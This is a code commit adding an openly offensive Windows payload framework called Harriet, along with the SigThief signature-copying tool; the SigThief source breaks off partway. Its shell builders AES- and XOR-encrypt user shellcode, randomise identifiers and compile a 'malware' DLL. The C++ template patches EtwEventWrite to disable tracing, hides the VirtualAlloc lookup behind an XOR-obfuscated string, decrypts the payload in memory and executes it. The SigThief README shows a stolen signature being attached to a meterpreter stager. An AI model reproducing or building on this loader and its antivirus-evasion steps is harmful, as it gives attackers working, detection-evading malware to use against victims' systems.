Add files via upload

Harriet/DLL.sh

@@ -0,0 +1,68 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+     _   _                 _      _   
+    | | | |               (_)    | |  
+    | |_| | __ _ _ __ _ __ _  ___| |_ 
+    |  _  |/ _  | __|  __| |/ _ \ __|
+    | | | | (_| | |  | |  | |  __/ |_ 
+    \_| |_/\__,_|_|  |_|  |_|\___|\__|
+                                                                                
+          **by assume-breach**
+
+A Payload Framework Waiting To Be Signatured"
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE AES Encryption w/ Process Injection DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash Harriet/DLLAES/DLLInj.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi

Harriet/DLLAES/DLLAes.sh

@@ -0,0 +1,124 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+  ___   _____ _____   _____                            _           _  ______ _      _     
+ / _ \ |  ___/  ___| |  ___|                          | |         | | |  _  \ |    | |    
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| | | | | | |    | |    
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` | | | | | |    | |    
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| | | |/ /| |____| |____
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_| |___/ \_____/\_____/
+                                            __/ | |                                       
+                                           |___/|_|                                       
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp Harriet/DLLAES/xor.py Harriet/DLLAES/Resources/xor.py
+cp Harriet/DLLAES/template.cpp Harriet/DLLAES/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 Harriet/DLLAES/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Harriet/DLLAES/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/DLLAES/Resources/template.cpp
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-19} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+sed -i "s/Random4/$Random4/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-14} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" Harriet/DLLAES/Resources/template.cpp
+
+#VIRTUALALLOC VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" Harriet/DLLAES/Resources/template.cpp
+
+#XOR FUNCTION VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" Harriet/DLLAES/Resources/template.cpp
+
+#XOR KEY VALUE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
+XOR_KEY=$(cat shell.txt)
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/template.cpp
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/xor.py
+
+#XOR KEY VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
+XOR_VARIABLE=$(cat shell.txt)
+sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/DLLAES/Resources/template.cpp
+rm shell.txt
+
+#VIRTUALALLOC - XOR String
+echo VirtualAlloc > virt.txt
+python3 Harriet/DLLAES/Resources/xor.py virt.txt > virtalloc.txt
+virt=$(cat virtalloc.txt)
+virt2="${virt::-8}" 
+sed -i "s/VIRALO/$virt2/g" Harriet/DLLAES/Resources/template.cpp 
+rm virt*
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE Harriet/DLLAES/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""

Harriet/DLLAES/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Harriet/DLLAES/Resources/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "YnNMojLDpktrJDj"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

Harriet/DLLAES/template.cpp

@@ -0,0 +1,110 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+#include <string.h>
+#include <tlhelp32.h>
+
+LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
+
+char XOR_VARIABLE []= "XOR_KEY";
+
+unsigned char Random9 []= VIRALO}; 
+
+
+int Random1(char * different, unsigned int different_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, different, &different_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+
+void RandomA(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
+        int r;
+        r = 0;
+        for (int i = 0; i < tada_len; i++) {
+                if (r == XOR_VARIABLE_len - 1) r = 0;
+
+                tada[i] = tada[i] ^ XOR_VARIABLE[r];
+                r++;
+        }
+}
+
+int main(void) {
+	
+	void * Random6_mem;
+	BOOL Random8;
+	HANDLE th;
+        DWORD oldprotect = 0;
+	
+	
+	char Random2[] = KEYVALUE
+	unsigned char Random3[] = PAYVAL
+	unsigned int Random7_len = sizeof(Random3);
+	
+	int pido = 0;
+        HANDLE hProc = NULL;	
+	
+	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
+        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
+
+        #ifdef _WIN64
+        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
+        #else
+        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
+        #endif  
+
+        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
+	
+	strrev(Random3);
+	FreeConsole();
+	strrev(Random3);
+
+	RandomA((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+        Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), Random9);
+
+	Random6_mem = Virt_Alloc(0, Random7_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+	Random1((char *) Random3, Random7_len, Random2, sizeof(Random2));
+		
+
+	RtlMoveMemory(Random6_mem, Random3, Random7_len);
+	
+
+	Random8 = VirtualProtect(Random6_mem, Random7_len, PAGE_EXECUTE_READ, &oldprotect);
+
+	if ( Random8 != 0 ) {
+			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Random6_mem, 0, 0, 0);
+			WaitForSingleObject(th, -1);
+	}
+	
+	return 0;
+}
+	

Harriet/DLLAES/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "XOR_KEY"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

Harriet/DLLInj/DLLInj.sh

@@ -0,0 +1,146 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+______                              _____      _           _   _              ______ _      _     
+| ___ \                            |_   _|    (_)         | | (_)             |  _  \ |    | |    
+| |_/ / __ ___   ___ ___  ___ ___    | | _ __  _  ___  ___| |_ _  ___  _ __   | | | | |    | |    
+|  __/ '__/ _ \ / __/ _ \/ __/ __|   | || '_ \| |/ _ \/ __| __| |/ _ \| '_ \  | | | | |    | |    
+| |  | | | (_) | (_|  __/\__ \__ \  _| || | | | |  __/ (__| |_| | (_) | | | | | |/ /| |____| |____
+\_|  |_|  \___/ \___\___||___/___/  \___/_| |_| |\___|\___|\__|_|\___/|_| |_| |___/ \_____/\_____/
+                                             _/ |                                                 
+                                            |__/                                                  
+
+EOF
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Enter The Process To Inject To! ex: svchost.exe"${clear}
+echo ""
+read SVCHOST
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+#Copying Templates
+cp Harriet/DLLInj/xor.py Harriet/DLLInj/Resources/xor.py
+cp Harriet/DLLInj/template.cpp Harriet/DLLInj/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+#Getting AES Values
+python3 Harriet/DLLInj/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+#REPLACING VALUES
+cp shell.txt shell2.txt
+
+#AES REPLACEMENTS
+
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Harriet/DLLInj/Resources/template.cpp
+
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/DLLInj/Resources/template.cpp
+sleep 2
+
+#RANDOM VALUE REPLACEMENTS
+#AESDecrypt
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-20} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" Harriet/DLLInj/Resources/template.cpp
+#FindTarget
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-18} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" Harriet/DLLInj/Resources/template.cpp
+#Inject
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" Harriet/DLLInj/Resources/template.cpp
+#AES KEY
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+sed -i "s/Random4/$Random4/g" Harriet/DLLInj/Resources/template.cpp
+#AES Payload
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" Harriet/DLLInj/Resources/template.cpp
+#VIRTUALALLOC VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" Harriet/DLLInj/Resources/template.cpp
+#XOR FUNCTION VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" Harriet/DLLInj/Resources/template.cpp
+
+#Exec VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" Harriet/DLLInj/Resources/template.cpp
+
+#PROCESS NAME VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-6} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" Harriet/DLLInj/Resources/template.cpp
+
+#XOR KEY VALUE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
+XOR_KEY=$(cat shell.txt)
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLInj/Resources/template.cpp
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLInj/Resources/xor.py
+
+#XOR KEY VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
+XOR_VARIABLE=$(cat shell.txt)
+sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/DLLInj/Resources/template.cpp
+
+
+#VIRTUALALLOC - Variable Name
+cat /proc/sys/kernel/random/uuid | sed 's/[-]//g' | head -c 20 > virtualalloc.txt
+VIRT_ALLOC=$(cat "virtualalloc.txt")
+sed -i "s/Alloc_Virtual/$VIRT_ALLOC/g" Harriet/DLLInj/Resources/template.cpp
+rm virt*
+
+#VIRTUALALLOC - XOR String
+
+echo VirtualAlloc > virt.txt
+python Harriet/DLLInj/Resources/xor.py virt.txt > virtalloc.txt
+virt=$(cat virtalloc.txt)
+virt2="${virt::-8}" 
+sed -i "s/VIRALO/$virt2/g" Harriet/DLLInj/Resources/template.cpp 
+rm virt*
+
+#PROCESS STRING
+
+echo $SVCHOST > proc.txt
+python Harriet/DLLInj/Resources/xor.py proc.txt > proc2.txt
+process=$(cat proc2.txt)
+process2="${process::-8}" 
+sed -i "s/PROCY/$process2/g" Harriet/DLLInj/Resources/template.cpp 
+rm proc*
+
+
+#Compiling Malware
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE Harriet/DLLInj/Resources/template.cpp -lcomctl32 -Wl,--subsystem,windows -fpermissive -Wno-narrowing >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}

Harriet/DLLInj/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Harriet/DLLInj/Resources/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "VqeaEoOtEhVmRBg"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

Harriet/DLLInj/SigThief/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Harriet/DLLInj/SigThief/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

Harriet/DLLInj/SigThief/sigthief.py

@@ -0,0 +1,269 @@
+#!/usr/bin/env python3
+# LICENSE: BSD-3
+# Copyright: Josh Pitts @midnite_runr
+
+import sys
+import struct
+import shutil
+import io
+from optparse import OptionParser
+
+
+def gather_file_info_win(binary):
+        """
+        Borrowed from BDF...
+        I could just skip to certLOC... *shrug*
+        """
+        flItms = {}
+        binary = open(binary, 'rb')
+        binary.seek(int('3C', 16))
+        flItms['buffer'] = 0
+        flItms['JMPtoCodeAddress'] = 0
+        flItms['dis_frm_pehdrs_sectble'] = 248
+        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
+        # Start of COFF
+        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
+        binary.seek(flItms['COFF_Start'])
+        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
+        binary.seek(flItms['COFF_Start'] + 2, 0)
+        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
+        binary.seek(flItms['COFF_Start'] + 16, 0)
+        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
+        #End of COFF
+        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
+
+        #if flItms['SizeOfOptionalHeader']:
+            #Begin Standard Fields section of Optional Header
+        binary.seek(flItms['OptionalHeader_start'])
+        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
+                                                               binary.read(4))[0]
+        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
+        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
+        if flItms['Magic'] != 0x20B:
+            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
+        # End Standard Fields section of Optional Header
+        # Begin Windows-Specific Fields of Optional Header
+        if flItms['Magic'] == 0x20B:
+            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
+        else:
+            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfImageLoc'] = binary.tell()
+        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
+        if flItms['Magic'] == 0x20B:
+            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
